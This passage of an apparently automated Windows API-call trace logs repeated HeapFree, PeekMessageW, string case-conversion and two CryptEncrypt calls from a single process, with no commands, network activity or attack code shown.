lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.314] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.314] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.314] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.314] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.315] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.315] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.315] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.316] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.316] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.316] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.316] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.317] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.317] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.317] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.317] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0251.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.318] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.318] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.318] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.319] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0251.319] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.322] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.323] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0251.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.323] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0251.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.323] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.323] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.323] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.323] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.324] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.324] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.324] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b18e8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b18e8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0251.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.324] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.324] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.324] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.324] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.324] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.325] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.325] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.325] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.325] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.325] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.325] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.325] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.325] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.325] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.325] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.325] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.325] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.325] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.325] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.325] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.326] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 